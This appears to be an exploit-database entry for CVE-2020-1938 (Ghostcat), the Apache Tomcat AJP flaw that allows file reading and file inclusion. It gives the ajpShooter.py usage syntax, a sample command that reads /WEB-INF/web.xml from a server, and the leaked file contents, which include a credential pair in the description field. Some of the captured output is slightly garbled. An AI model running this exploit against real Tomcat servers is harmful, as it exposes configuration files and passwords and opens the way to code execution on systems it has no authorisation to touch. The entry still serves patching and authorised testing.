# Exploit Title: tomcat ajp协议任意属性设置导致的文件读取和文件执行。 # Author: Chaitin Tech # Date: 01.02.2020 # Link: https://github.com/00theway/Ghostcat-CNVD-2020-10487 # CVE: CVE-2020-1938 # Testing and Debugging: Tayfun Akyıldız #Linkedin: https://www.linkedin.com/in/tayfun-akyildiz ajpShooter.py [-h] [--ajp-ip AJP_IP] [-H HEADER] [-X {GET,POST,HEAD,OPTIONS,PROPFIND}] [-d DATA] [-o OUT_FILE] [--debug] url ajp_port target_file {read,eval} - $ python3 ajpShooter.py http://192.168.1.20:8080 8069 /WEB-INF/web.xml read [<] 200 200 [<] Accept-Ranges: bytes [<] ETag: w/ 1250-1666761332000" [<] Last-Modified: Mon, 30 Nov 2020 18:35:32 GMT [<] Content-Type: application/xml [<] Content-Length: 1250 <?xml version="1.0" encoding="UTF-8"?> Licensed to the Apache Software Foundation (ASF) under one or more contributor license agreements. See the NOTICE file distributed with this work for additional information regarding copyright ownership. The ASF licenses this file to you under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. <web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xmlns. jcp.org/xml/ns/javaee http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd" version="4.0" metadata-complete="true"> <display-name>Welcome to Tomcat/display-name> <description> Welcome to Tomcat tomcat:s3cret </description> k/web-app